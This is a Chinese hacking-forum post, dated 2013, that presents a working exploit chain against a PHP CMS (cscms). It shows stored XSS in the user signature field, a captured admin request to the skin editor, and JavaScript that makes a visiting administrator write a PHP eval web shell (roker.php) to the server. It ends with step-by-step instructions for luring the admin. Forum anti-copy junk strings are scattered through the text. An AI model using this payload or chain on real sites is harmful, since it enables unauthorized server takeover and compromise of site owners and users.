|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题- n4 k9 v$ M* m/ q) d9 U# f
官网已经修补了,所以重新下了源码
5 s* A! I# P3 |( k# o$ L' L因为 后台登入 还需要认证码 所以 注入就没看了。8 O/ t1 D' V, C, m- B# c
存在 xss3 h! I U/ _5 t3 X; ~+ S
漏洞文件 user/member/skin_edit.php; q" g8 w% P, S2 q
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
`7 u& ^+ v: K% g! l V, x# s
, z: k2 |- C; o) \</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
# Y' e* p( r5 W# Z6 k8 |
# X: i! t: I8 J" i8 J</textarea></td></tr>+ |$ W! }2 j2 {
. L4 l) y: J0 D' j& s: d* e( z! S8 d
user/do.php
$ M' J) B0 H2 H2 i# t t) L: R1 X! e8 O
) s7 [4 c$ c$ J3 _7 d% k8 q
if($op=='zl'){ //资料: |2 a+ H: z, e
8 \) n' ~2 W3 Y! a( L0 r) x, }- O if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) & k2 D, ^# @( K$ q- m
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));3 j6 {, ^6 F- O) y0 d e! o3 T
( x- D) A" i1 \# f5 G# a $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 G- V+ o0 A' N, X, u) j: H: b
& L' M6 c/ ~& V' `) R
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
+ T9 s- X0 [! g: q where CS_Name='".$cscms_name."'";. o7 D R/ {/ h
' z2 @1 M) J) e/ j4 V4 ^( ^ if($db->query($sql)){
0 R% b0 a& K8 ]" ^5 N
/ `9 a, ^4 }$ ?( ^7 ^ j1 B' M exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));. A. m9 L* Y/ e8 T/ c j
]* S/ h$ C( |' ]
}else{+ o% [* _1 U7 P- A/ H8 [+ q
3 i+ h" o$ C0 P% Q
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
0 m P% ]& q; U' \, H - G$ g9 ~& z ?) ]
}
2 s9 g! I, m: h* ]6 f, }* P' G
& G3 G, b" p* u5 q- R' c3 h4 j! q6 ]
# l( ^. X( @# }3 M, H没有 过滤导致xss产生。
9 S! H" n8 ~3 c9 F7 ~后台 看了下 很奇葩的是可以写任意格式文件。。
" X' \7 B3 c$ s) E0 m9 w8 p抓包。。
! B) X9 n, f u; C+ H8 i% A
* G M0 H9 V3 {/ s4 R% V6 R2 [+ D. m1 V
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1& g+ E% y! m0 g
+ ?8 `8 O3 _, {9 I9 e1 L8 w
Accept: text/html, application/xhtml+xml, */*
# e* R0 l1 W, u$ n' t2 R7 a; f$ w' I$ z
& S( _) _- c& L. cReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
$ E0 M& v6 {! M! O% V$ e3 b
- ~% I) P" T- g: ?+ EAccept-Language: zh-CN" J* |( b# S( D& t
+ i! B( j/ F. h( K( Z. v% AUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
, d) }. U% k& }" X! N. }1 o
0 [6 E' O& b D* ~: g$ l! `: DContent-Type: application/x-www-form-urlencoded
' ?& d2 k) K0 p+ l& ^" a
K4 t' m7 [6 \9 `* u8 h4 _, p4 RAccept-Encoding: gzip, deflate y1 s( ]2 W! a; y2 F
. M3 C" K" K, ^Host: 127.0.0.1
" s; x3 I0 k$ m/ G5 j
" ?1 v1 Y* t: k! V" M* s+ |' ^/ xContent-Length: 38/ p8 B7 s! d6 }4 M; D* e" {' y9 ^, E
; {% W$ V! U1 r# `; e
DNT: 1
% d7 }1 V! w/ S4 W0 | 5 s! q# f4 g& U0 l' l w
Connection: Keep-Alive% r* u5 L$ Y) J& G- }+ c' n, n G+ F
, @: C, K2 }5 Y( S) b8 wCache-Control: no-cache
7 L6 _% M2 v+ z4 @ C7 M F4 L; p7 }4 H' O" a! i
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
- T+ }* J) E" D) p8 X
7 I4 F6 T1 T( Y6 N2 k& n4 J, i9 Z* G, h( L8 T; x& y6 e! X; h& w" B, V$ D
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
, j t+ j( S* }
* Q9 N3 `% D: E$ B, b; D6 h0 B1 F5 } v+ j- o3 q1 M
2 Z% _& Y% L1 B于是 构造js如下。
" A8 B! V- P" ~. l* t1 D
& O- N7 V" M' o' ~! G本帖隐藏的内容<script> ! _( A0 y8 }% g
thisTHost = top.location.hostname;/ ^% \$ P5 ?# G; {; p% s2 k0 k
4 ~- l* b, o* R6 Q, ?2 _+ J; H
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";: O7 F0 o g/ D5 y1 I% C
2 `$ ]8 Q% S& g$ l
function PostSubmit(url, data, msg) { * i- c( q* H' Y7 \* y" z
var postUrl = url;( L5 T. P* l4 q: i8 b
9 E, I" V' m, r var postData = data;
1 G7 X. @! r+ s$ s var msgData = msg; ! X5 a- Y; ?5 j# F u' O; X2 D4 a
var ExportForm = document.createElement("FORM"); ! y3 p* B4 }4 A- j
document.body.appendChild(ExportForm);
6 n: m: |* M! R! p* p9 Y5 f5 j ExportForm.method = "POST"; - v" y3 i( l3 p+ n3 Y+ W0 u4 M
var newElement = document.createElement("input");
$ B9 c" c; w, H7 A1 Y newElement.setAttribute("name", "name");
1 z2 _ ?6 ?0 }$ h; }" L+ y9 J, t newElement.setAttribute("type", "hidden");
5 F) |0 z9 v4 S& ]+ N3 a& E var newElement2 = document.createElement("input");
, @; W ~) \# A newElement2.setAttribute("name", "content"); ) X" E+ a9 l j# \2 A: X
newElement2.setAttribute("type", "hidden");
/ v' \+ R+ H/ B- ?+ J) f ExportForm.appendChild(newElement);
. i3 Z2 A6 e+ S4 y, j4 ^% x5 C ExportForm.appendChild(newElement2); 4 ~/ S, K& {% R F& E! \( ^
newElement.value = postData; 9 Z i7 t& e7 _
newElement2.value = msgData; " x8 G- T( N: f: G; g( O f0 ^
ExportForm.action = postUrl; & P, `( h4 _$ w0 S* ^% u5 C% `
ExportForm.submit();
& s' g% e4 P9 M};8 W6 H- p: l$ l4 a+ ]5 M# U
S' u5 u! C+ T# s4 K% ?: MPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");4 G; O K! H7 R7 @8 Z+ B3 W& E- x
6 {* h. c$ _8 k% f. I8 C+ ]! \- T/ J</script>- h2 }7 H0 }2 A" f/ @; h
( H- J! ?; M( J% S# n9 K
. @# H. a* A5 D. ~" C
7 M/ P2 C9 n) [, ]- A; Yhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
. t* |# B8 D8 y: z y4 e$ ^, i用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
4 y: A! L1 p9 r; F# ^% ~ p就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
* C$ A2 {6 Z& F1 l4 G3 B |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对